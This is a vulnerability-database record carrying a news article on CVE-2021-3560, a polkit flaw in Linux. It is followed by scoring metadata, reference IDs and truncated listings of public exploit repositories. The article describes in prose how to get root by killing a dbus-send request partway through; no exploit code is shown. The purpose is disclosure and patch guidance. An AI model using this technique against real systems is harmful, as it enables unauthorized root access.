DATABASE RESOURCES PRICING ABOUT US

{"id": "THN:7D808DA5BB6D2A23EA6B46357E238546", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "7-Year-Old Polkit Flaw Lets Unprivileged Linux Users Gain Root Access", "description": "[](<https://thehackernews.com/images/-szO1rPyr148/YMMS6mQDSJI/AAAAAAAAC1Q/dxz_XWn-9M0w7Z78ShUKaPdWj4_p1GGsgCLcBGAsYHQ/s0/root.jpg>)\n\nA seven-year-old privilege escalation vulnerability discovered in the polkit system service could be exploited by a malicious unprivileged local attacker to bypass authorization and escalate permissions to the root user.\n\nTracked as [CVE-2021-3560](<https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/>) (CVSS score: 7.8), the flaw affects polkit versions between 0.113 and 0.118 and was discovered by GitHub security researcher Kevin Backhouse, who said the issue was [introduced in a code commit](<https://gitlab.freedesktop.org/polkit/polkit/-/commit/bfa5036bfb93582c5a87c44b847957479d911e38>) made on Nov. 9, 2013. Red Hat's Cedric Buissart [noted](<https://seclists.org/oss-sec/2021/q2/180>) that Debian-based distributions, based on polkit 0.105, are also vulnerable.\n\n[Polkit](<https://en.wikipedia.org/wiki/Polkit>) (n\u00e9e PolicyKit) is a toolkit for defining and handling authorizations in Linux distributions, and is used for allowing unprivileged processes to communicate with privileged processes.\n\n\"When a requesting process disconnects from dbus-daemon just before the call to polkit_system_bus_name_get_creds_sync starts, the process cannot get a unique uid and pid of the process and it cannot verify the privileges of the requesting process,\" Red Hat [said](<https://access.redhat.com/security/cve/CVE-2021-3560>) in an advisory. \"The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.\"\n\nRHEL 8, Fedora 21 (or later), Debian \"Bullseye,\" and Ubuntu 20.04 are some of the popular Linux distributions impacted by the polkit vulnerability. The issue has been mitigated in [version 0.119](<https://www.freedesktop.org/software/polkit/releases/>), which was released on June 3.\n\n[](<https://thehackernews.com/images/--6FhFchuw9Q/YMMUS2bN9SI/AAAAAAAAC1Y/YlleoffcproiQJ7COuhbiO1E3vmo5bKAgCLcBGAsYHQ/s0/hacking-news.jpg>)\n\n\"The vulnerability is surprisingly easy to exploit. All it takes is a few commands in the terminal using only standard tools like [bash](<https://linux.die.net/man/1/bash>), [kill](<https://linux.die.net/man/2/kill>), and [dbus-send](<https://linux.die.net/man/1/dbus-send>),\" said Backhouse in a write-up published yesterday, adding the flaw is triggered by sending a dbus-send command (say, to create a new user) but terminating the process while polkit is still in the middle of processing the request.\n\n\"dbus-send\" is a Linux inter-process communication (IPC) mechanism that's used to send a message to [D-Bus](<https://en.wikipedia.org/wiki/D-Bus>) message bus, allowing communication between multiple processes running concurrently on the same machine. Polkit's policy authority daemon is [implemented](<https://www.freedesktop.org/software/polkit/docs/latest/polkit.8.html>) as a service connected to the system bus to authenticate credentials securely.\n\nIn killing the command, it causes an authentication bypass because polkit mishandles the terminated message and treats the request as though it came from a process with root privileges ([UID 0](<https://en.wikipedia.org/wiki/User_identifier>)), thereby immediately authorizing the request.\n\n\"To trigger the vulnerable codepath, you have to disconnect at just the right moment,\" Backhouse said. \"And because there are multiple processes involved, the timing of that 'right moment' varies from one run to the next. That's why it usually takes a few tries for the exploit to succeed. I'd guess it's also the reason why the bug wasn't previously discovered.\"\n\nUsers are encouraged to update their Linux installations as soon as possible to remediate any potential risk arising out of the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-06-11T07:47:00", "modified": "2021-06-11T07:47:01", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 7.2}, "severity": "HIGH", "exploitabilityScore": 3.9, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/06/7-year-old-polkit-flaw-lets.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2021-3560"], "immutableFields": [], "lastseen": "2022-05-09T12:37:58", "viewCount": 157, "enchantments": {"dependencies": {"references": [{"type": "almalinux", "idList": ["ALSA-2021:2238"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2021-3560"]}, {"type": "altlinux", "idList": ["8FE218324E5B4E872D02C220B1A59D5A"]}, {"type": "archlinux", "idList": ["ASA-202106-24"]}, {"type": "cve", "idList": ["CVE-2021-3560"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-3560"]}, {"type": "exploitdb", "idList": ["EDB-ID:50011"]}, {"type": "f5", "idList": ["F5:K41410307"]}, {"type": "fedora", "idList": ["FEDORA:6431E305A8AE", "FEDORA:D126131F01F8"]}, {"type": "freebsd", "idList": ["36A35D83-C560-11EB-84AB-E0D55E2A8BF9"]}, {"type": "gentoo", "idList": ["GLSA-202107-31"]}, {"type": "github", "idList": ["GITHUB:D8A86B15D051270840BFEF47E7434ED2"]}, {"type": "githubexploit", "idList": ["090B9267-05A2-54BE-B7F4-C0F49CDE011D", "39C90135-C62D-5BC8-B5D5-E979C89C96E0", "4A3FAE75-F285-5A77-9040-F767B1856A17", "4DC0E03F-8753-543D-A4E9-1244313FCC06", "6DB4BE3A-051F-58C6-9266-A278C41A707E", "6E1579B5-B91F-5348-A0B2-8218964434CA", "72D36AF5-1D4B-53BF-8A5F-28BFD556A52E", "7A9A11EA-FF06-5AD3-A559-CA9EF02D443F", "8355CDEF-4353-5AEE-915E-3AF0E2AF9409", "8864D179-08CB-51B7-8B06-0D64118BD6B9", "8A038044-FF93-55CF-A4E2-E5AF05A46130", "A36243CA-7BAA-5CA7-82CB-A7C4B24456B6", "A7D8D274-4FE7-5BFB-B3A3-7EDB427ED94E", "A98AE857-3243-58DB-B11E-BF7F9CBDA573", "B9510646-2BAA-56FD-ABAC-FEAE65C9F78D", "CA263D10-7886-5A7A-AC16-94EA3B11396F", "CACC713E-498A-52BA-B12E-23D4C11929E7", "E0649464-438C-5420-8A33-0542A884B4BA", "F1CDC6B3-63A4-5931-9CAD-8E40F7450674", "FC96322B-C3D8-5037-9C04-217A27794418", "FEA13486-D1C3-5F54-9DB3-54F8FC08811A"]}, {"type": "mageia", "idList": ["MGASA-2021-0244"]}, {"type": "nessus", "idList": ["ALMA_LINUX_ALSA-2021-2238.NASL", "CENTOS8_RHSA-2021-2238.NASL", "EULEROS_SA-2021-2311.NASL", "EULEROS_SA-2021-2537.NASL", "EULEROS_SA-2021-2561.NASL", "EULEROS_SA-2021-2738.NASL", "EULEROS_SA-2021-2765.NASL", "EULEROS_SA-2022-1090.NASL", "FREEBSD_PKG_36A35D83C56011EB84ABE0D55E2A8BF9.NASL", "GENTOO_GLSA-202107-31.NASL", "NEWSTART_CGSL_NS-SA-2022-0061_POLKIT.NASL", "OPENSUSE-2021-1843.NASL", "OPENSUSE-2021-838.NASL", "ORACLELINUX_ELSA-2021-2238.NASL", "PHOTONOS_PHSA-2021-1_0-0397_POLKIT.NASL", "PHOTONOS_PHSA-2021-2_0-0350_POLKIT.NASL", "PHOTONOS_PHSA-2021-3_0-0248_POLKIT.NASL", "PHOTONOS_PHSA-2021-4_0-0037_POLKIT.NASL", "REDHAT-RHSA-2021-2237.NASL", "REDHAT-RHSA-2021-2238.NASL", "REDHAT-RHSA-2021-2522.NASL", "REDHAT-RHSA-2021-2555.NASL", "ROCKY_LINUX_RLSA-2021-2238.NASL", "SLACKWARE_SSA_2021-158-02.NASL", "SUSE_SU-2021-1842-1.NASL", "SUSE_SU-2021-1843-1.NASL", "SUSE_SU-2021-1844-1.NASL", "UBUNTU_USN-4980-1.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2021-2238"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163142", "PACKETSTORM:163452"]}, {"type": "photon", "idList": ["PHSA-2021-0037", "PHSA-2021-0248", "PHSA-2021-0350", "PHSA-2021-0397", "PHSA-2021-1.0-0397", "PHSA-2021-2.0-0350", "PHSA-2021-3.0-0248", "PHSA-2021-4.0-0037"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8495B2B62A16EF7A1217077330A344B3"]}, {"type": "redhat", "idList": ["RHSA-2021:2236", "RHSA-2021:2237", "RHSA-2021:2238", "RHSA-2021:2522", "RHSA-2021:2555", "RHSA-2021:2920", "RHSA-2021:3016", "RHSA-2021:3119"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-3560"]}, {"type": "rocky", "idList": ["RLSA-2021:2238"]}, {"type": "seebug", "idList": ["SSV:99275"]}, {"type": "slackware", "idList": ["SSA-2021-158-02"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0838-1", "OPENSUSE-SU-2021:1843-1"]}, {"type": "thn", "idList": ["THN:205C973376C6EB6419ADECED2ADA9A25"]}, {"type": "ubuntu", "idList": ["USN-4980-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3560"]}, {"type": "veracode", "idList": ["VERACODE:30804"]}, {"type": "zdt", "idList": ["1337DAY-ID-36421", "1337DAY-ID-36544"]}]}, "score": {"value": 0.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "almalinux", "idList": ["ALSA-2021:2238"]}, {"type": "archlinux", "idList": ["ASA-202106-24"]}, {"type": "cve", "idList": ["CVE-2021-3560"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-3560"]}, {"type": "exploitdb", "idList": ["EDB-ID:50011"]}, {"type": "f5", "idList": ["F5:K41410307"]}, {"type": "fedora", "idList": ["FEDORA:6431E305A8AE", "FEDORA:D126131F01F8"]}, {"type": "freebsd", "idList": ["36A35D83-C560-11EB-84AB-E0D55E2A8BF9"]}, {"type": "gentoo", "idList": ["GLSA-202107-31"]}, {"type": "github", "idList": ["GITHUB:D8A86B15D051270840BFEF47E7434ED2"]}, {"type": "githubexploit", "idList": ["4DC0E03F-8753-543D-A4E9-1244313FCC06", "6DB4BE3A-051F-58C6-9266-A278C41A707E", "6E1579B5-B91F-5348-A0B2-8218964434CA", "72D36AF5-1D4B-53BF-8A5F-28BFD556A52E", "7A9A11EA-FF06-5AD3-A559-CA9EF02D443F", "8355CDEF-4353-5AEE-915E-3AF0E2AF9409", "A98AE857-3243-58DB-B11E-BF7F9CBDA573", "B9510646-2BAA-56FD-ABAC-FEAE65C9F78D", "CA263D10-7886-5A7A-AC16-94EA3B11396F", "E0649464-438C-5420-8A33-0542A884B4BA", "F1CDC6B3-63A4-5931-9CAD-8E40F7450674", "FC96322B-C3D8-5037-9C04-217A27794418", "FEA13486-D1C3-5F54-9DB3-54F8FC08811A"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2021-3560/", "MSF:ILITIES/ORACLE_LINUX-CVE-2021-3560/", "MSF:ILITIES/REDHAT_LINUX-CVE-2021-3560/", "MSF:ILITIES/SUSE-CVE-2021-3560/", "MSF:ILITIES/UBUNTU-CVE-2021-3560/"]}, {"type": "nessus", "idList": ["CENTOS8_RHSA-2021-2238.NASL", "EULEROS_SA-2021-2537.NASL", "EULEROS_SA-2021-2561.NASL", "EULEROS_SA-2022-1090.NASL", "FREEBSD_PKG_36A35D83C56011EB84ABE0D55E2A8BF9.NASL", "GENTOO_GLSA-202107-31.NASL", "OPENSUSE-2021-1843.NASL", "OPENSUSE-2021-838.NASL", "ORACLELINUX_ELSA-2021-2238.NASL", "PHOTONOS_PHSA-2021-1_0-0397_POLKIT.NASL", "PHOTONOS_PHSA-2021-2_0-0350_POLKIT.NASL", "PHOTONOS_PHSA-2021-3_0-0248_POLKIT.NASL", "PHOTONOS_PHSA-2021-4_0-0037_POLKIT.NASL", "REDHAT-RHSA-2021-2237.NASL", "REDHAT-RHSA-2021-2238.NASL", "REDHAT-RHSA-2021-2522.NASL", "REDHAT-RHSA-2021-2555.NASL", "SLACKWARE_SSA_2021-158-02.NASL", "SUSE_SU-2021-1842-1.NASL", "SUSE_SU-2021-1843-1.NASL", "SUSE_SU-2021-1844-1.NASL", "UBUNTU_USN-4980-1.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2021-2238"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163142", "PACKETSTORM:163452"]}, {"type": "photon", "idList": ["PHSA-2021-1.0-0397", "PHSA-2021-2.0-0350", "PHSA-2021-3.0-0248", "PHSA-2021-4.0-0037"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8495B2B62A16EF7A1217077330A344B3"]}, {"type": "redhat", "idList": ["RHSA-2021:2236", "RHSA-2021:2237", "RHSA-2021:2238", "RHSA-2021:2522", "RHSA-2021:2555"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-3560"]}, {"type": "rocky", "idList": ["RLSA-2021:2238"]}, {"type": "seebug", "idList": ["SSV:99275"]}, {"type": "slackware", "idList": ["SSA-2021-158-02"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0838-1", "OPENSUSE-SU-2021:1843-1"]}, {"type": "thn", "idList": ["THN:205C973376C6EB6419ADECED2ADA9A25"]}, {"type": "ubuntu", "idList": ["USN-4980-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3560"]}, {"type": "zdt", "idList": ["1337DAY-ID-36421", "1337DAY-ID-36544"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-3560", "epss": "0.000860000", "percentile": "0.348900000", "modified": "2023-03-17"}], "vulnersScore": 0.6}, "_state": {"dependencies": 1660004461, "score": 1684007986, "epss": 1679073339}, "_internal": {"score_hash": "e0283c43b1558548c0c2b19847c4e64b"}}

{"altlinux": [{"lastseen": "2023-05-07T11:55:14", "description": "0.116-alt2.M90P.2 built June 15, 2021 Denis Medvedev in task #274034\n\nJune 8, 2021 Denis Medvedev\n \n \n - (Fixes: CVE-2021-3560)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-15T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 9 package polkit version 0.116-alt2.M90P.2", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-15T00:00:00", "id": "8FE218324E5B4E872D02C220B1A59D5A", "href": "https://packages.altlinux.org/en/p9/srpms/polkit/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-07-11T21:09:33", "description": "# Polkit D-Bus Authentication Bypass Exploit\n\n* A vulnerability ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-30T11:41:34", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-06-15T21:10:49", "id": "6DB4BE3A-051F-58C6-9266-A278C41A707E", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-11T21:09:05", "description": "# CVE-2021-3560_PoC\npolkit exploit script\n\nAutomated script for ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-14T03:45:38", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-07-02T18:28:41", "id": "FEA13486-D1C3-5F54-9DB3-54F8FC08811A", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-11T21:12:41", "description": "# CVE-2021-3560\n#...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T10:03:26", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-08-05T02:09:29", "id": "A98AE857-3243-58DB-B11E-BF7F9CBDA573", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-08T17:32:06", "description": "# CVE-2021-3560 PolKit\u6761\u4ef6\u7ade\u4e89\u672c\u5730\u63d0\u6743\u5206\u6790\r\n\r\n[toc]\r\n\r\n## \u6f0f\u6d1e\u7b80\u4ecb\r\n\r\n\u6f0f\u6d1e\u7f16\u53f7: CV...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-31T09:02:23", "type": "githubexploit", "title": "Exploit for Incorrect Authorization in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-02-07T02:00:58", "id": "8A038044-FF93-55CF-A4E2-E5AF05A46130", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-28T11:58:23", "description": "PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)\n====...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-30T05:53:45", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2023-09-28T11:38:26", "id": "4A3FAE75-F285-5A77-9040-F767B1856A17", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-28T13:34:20", "description": "PolicyKit CVE-2021-3560 Exploit (Authentication Agent)\n====\n\n##...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-29T18:57:30", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2023-09-28T11:38:26", "id": "39C90135-C62D-5BC8-B5D5-E979C89C96E0", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T06:16:15", "description": "# CVE-2021-3560-Polkit-Privilege-Esclation PoC\n\n## Original rese...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-14T20:08:20", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-08-17T04:28:02", "id": "CA263D10-7886-5A7A-AC16-94EA3B11396F", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-06-19T16:45:55", "description": "# CVE-2021-3560-Polkit-DBus\nSimple proof of concenpt script for ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-13T10:12:51", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-11-19T21:44:57", "id": "F1CDC6B3-63A4-5931-9CAD-8E40F7450674", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-11T23:23:04", "description": "CVE-2021-3560 (polkit)\r\nEl uso de este script en python omite la...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-08T20:27:00", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, 